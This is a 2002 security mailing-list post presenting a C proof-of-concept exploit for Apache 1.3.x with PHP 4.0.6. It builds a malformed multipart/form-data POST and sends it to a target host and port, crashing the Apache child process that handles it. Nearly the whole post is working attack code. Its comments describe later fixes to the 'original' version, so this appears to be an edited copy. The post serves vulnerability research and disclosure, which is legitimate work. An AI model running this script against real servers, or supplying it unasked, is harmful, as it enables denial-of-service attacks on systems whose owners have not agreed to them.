Apache+php Proof of Concept Exploit

From: Gabriel A. Maggiotti (gmaggiotat_private)
Date: Mon Mar 04 2002 - 14:18:42 PST


    /*
    ---------------------------------------------------------------------------
    Web:  http://qb0x.net                   Author: Gabriel A. Maggiotti
    Date: February 03, 2002                 E-mail: gmaggiotat_private
    ---------------------------------------------------------------------------
    
    Summary
    -------
    This is a proof-of-concept exploit for Apache/1.3.x + PHP 4.0.6.  It
    exploits a bug in the handling of multipart/form-data POST requests.  It
    only crashes the Apache child process that handles the request (see the
    error_log excerpt below); it does not open a shell or execute code on the
    remote server.  PHP supports multipart/form-data POST requests (described
    in RFC 1867), known as POST file uploads.  Unfortunately there are several
    flaws in the php_mime_split function that could be used by an attacker to
    execute arbitrary code.  I don't know whether the bug this code triggers
    is already publicly known.
    
    Example:
    -------
    
    <quote>
    [gabi@pluto logs]$ ./apache_php host 80 hi.php
    [gabi@pluto logs]$ cat /www/logs/error_log
    
    [Sun Mar  3 02:50:36 2002] [notice] child pid 26856 exit signal Segmentation
     fault (11)
    
    [gabi@pluto logs]$ 
    </quote>
    
    Greets:
    ------
    A special greets to Fernando Oubi#a and Sebastian Brocher, good friends of
    mine.
     
    A very   special  greets for a  good   friend  and an excellent Security 
    Consultant Alex Hernandez!!!
    
    */
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <sys/wait.h>
    #include <unistd.h>
    #include <fcntl.h>
    
    /* Size of the request template in main() and of the scratch buffer in
     * str_replace(); everything str_replace() writes must fit in MAX-1 bytes
     * plus the terminating NUL. */
    #define MAX	1000
    /* Not referenced anywhere in this listing: the port is taken from argv[2]. */
    #define PORT	80
    
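    #ifndef MAX
    /* MAX is defined at the top of this file; the guard only keeps this
     * function compilable on its own. */
    #define MAX	1000
    #endif

    /*
     * Replace the first occurrence of `orig` in `string` with `rep`, in place.
     *
     * `string` is assumed to live in a buffer of MAX bytes (the only caller
     * passes POST_REQUEST[MAX]); the function cannot see the real capacity,
     * so MAX is the bound it enforces.
     *
     * Returns `string` on success.  Returns NULL, leaving `string` untouched,
     * when any argument is NULL, when `orig` does not occur in `string`, or
     * when the result would not fit in MAX-1 bytes plus the terminator.
     *
     * The original version dereferenced the NULL from a failed strstr() and
     * let an over-long `rep` -- argv[3], i.e. user-controlled -- overflow
     * its MAX-byte stack buffer.
     */
    char *str_replace(const char *rep, const char *orig, char *string)
    {
    	if (rep == NULL || orig == NULL || string == NULL)
    		return NULL;

    	char *pt = strstr(string, orig);
    	if (pt == NULL)
    		return NULL;

    	size_t head = (size_t)(pt - string);
    	size_t rep_len = strlen(rep);
    	size_t orig_len = strlen(orig);
    	size_t tail_len = strlen(pt + orig_len);

    	/* head + rep + tail + NUL must fit in the MAX-byte destination; the
    	 * first test also keeps the subtraction in the second from wrapping. */
    	if (rep_len + tail_len > (size_t)MAX - 1)
    		return NULL;
    	if (head > (size_t)MAX - 1 - rep_len - tail_len)
    		return NULL;

    	/* Shift the tail (including its NUL) to its final place first; the
    	 * regions may overlap, hence memmove.  Then drop the replacement in. */
    	memmove(string + head + rep_len, pt + orig_len, tail_len + 1);
    	memcpy(string + head, rep, rep_len);
    	return string;
    }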
    
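    /*
     * Parse a decimal TCP port from `text`.
     * Returns the port, or -1 if `text` is not an integer in 1..65535
     * (atoi() in the original silently turned garbage into port 0).
     */
    static int parse_port(const char *text)
    {
    	char *end = NULL;
    	errno = 0;
    	long value = strtol(text, &end, 10);
    	if (end == text || *end != '\0' || errno == ERANGE)
    		return -1;
    	if (value < 1 || value > 65535)
    		return -1;
    	return (int)value;
    }

    /*
     * Resolve `host` as an IPv4 address and open a TCP connection to `port`.
     * Returns a connected socket descriptor, or -1 after printing the reason
     * to stderr.  gethostbyname() is kept from the original (obsolete, but it
     * needs no extra headers); only the first returned address is tried.
     */
    static int connect_ipv4(const char *host, int port)
    {
    	struct hostent *he = gethostbyname(host);
    	if (he == NULL) {
    		/* gethostbyname() reports through h_errno, not errno, so the
    		 * original's perror() printed an unrelated message here. */
    		fprintf(stderr, "gethostbyname: cannot resolve %s\n", host);
    		return -1;
    	}
    	/* The original copied h_addr blindly; make sure it really is a
    	 * 4-byte IPv4 address before memcpy()ing it into sin_addr. */
    	if (he->h_addrtype != AF_INET
    	    || he->h_length != (int)sizeof(struct in_addr)
    	    || he->h_addr_list[0] == NULL) {
    		fprintf(stderr, "%s: no IPv4 address\n", host);
    		return -1;
    	}

    	struct sockaddr_in their_addr;
    	memset(&their_addr, 0, sizeof their_addr);
    	their_addr.sin_family = AF_INET;
    	their_addr.sin_port = htons((unsigned short)port);
    	memcpy(&their_addr.sin_addr, he->h_addr_list[0], sizeof their_addr.sin_addr);

    	int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    	if (sockfd == -1) {
    		perror("socket");
    		return -1;
    	}
    	if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) == -1) {
    		perror("connect");
    		close(sockfd);
    		return -1;
    	}
    	return sockfd;
    }

    /*
     * Send all `len` bytes of `buf` on `fd`, continuing after short writes
     * and EINTR (the original issued a single send() and ignored its count).
     * Returns 0 on success, -1 with errno set on failure.
     */
    static int send_all(int fd, const char *buf, size_t len)
    {
    	while (len > 0) {
    		ssize_t n = send(fd, buf, len, 0);
    		if (n < 0) {
    			if (errno == EINTR)
    				continue;
    			return -1;
    		}
    		buf += n;
    		len -= (size_t)n;
    	}
    	return 0;
    }

    /*
     * Entry point: ./apache_php <hostname> <port> <php_file>
     *
     * Builds the multipart/form-data POST below with argv[3] substituted for
     * "##file", sends it once and closes the connection.  Exit status is 0
     * when the request was delivered and 1 on any usage, resolution,
     * connection or send error (the original exited 0 after a failed send).
     */
    int main(int argc, char *argv[])
    {
    	/* Request template, byte-for-byte as in the original.  Line endings
    	 * are bare "\n" rather than CRLF, and the declared Content-Length
    	 * (567) is larger than the body that is actually sent, so the server
    	 * sees the connection close mid-body.  Both are left as found: this
    	 * is a crash trigger, not a well-formed upload, and this listing does
    	 * not say which of these details the crash depends on. */
    	char POST_REQUEST[MAX] =
    		"POST ##file HTTP/1.0\n"
    		"Referer: http://host/xxxxxx/exp.php?hi_lames=haha\n"
    		"Connection: Keep-Alive\nContent-type: multipart/for"
    		"m-data; boundary=---------------------------1354088"
    		"10612827886801697150081\nContent-Length: 567\n\n---"
    		"--------------------------1354088106128278868016971"
    		"50081\nContent-Disposition: form-data; name=\"\x8\"";
    	static const char placeholder[] = "##file";

    	if (argc != 4) {
    		fprintf(stderr, "usage:%s <hostname> <port> <php_file>\n", argv[0]);
    		return 1;
    	}

    	int port = parse_port(argv[2]);
    	if (port < 0) {
    		fprintf(stderr, "invalid port: %s\n", argv[2]);
    		return 1;
    	}

    	/* argv[3] replaces the 6-byte placeholder inside a MAX-byte buffer;
    	 * reject it up front so str_replace() can never overrun POST_REQUEST
    	 * (its original version copied without any bound). */
    	size_t room = sizeof POST_REQUEST - 1
    	            - (strlen(POST_REQUEST) - (sizeof placeholder - 1));
    	if (strlen(argv[3]) > room) {
    		fprintf(stderr, "php_file too long (max %zu bytes)\n", room);
    		return 1;
    	}
    	char *request = str_replace(argv[3], placeholder, POST_REQUEST);
    	if (request == NULL) {
    		fprintf(stderr, "could not build request\n");
    		return 1;
    	}

    	int sockfd = connect_ipv4(argv[1], port);
    	if (sockfd == -1)
    		return 1;

    	int status = 0;
    	if (send_all(sockfd, request, strlen(request)) == -1) {
    		perror("send");
    		status = 1;
    	}
    	close(sockfd);
    	return status;
    }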
    
    /*
    ---------------------------------------------------------------------------
    research-listat_private is dedicated to interactively researching vulnerab-
    ilities and reporting potential or undeveloped holes in any kind of computer
    system.  To subscribe to research-listat_private, send a blank email to
    research-list-subscribeat_private.  More help is available by sending an
    email to research-list-helpat_private.
    Note: the list doesn't allow HTML; it will be stripped from messages.
    ---------------------------------------------------------------------------
    */
    


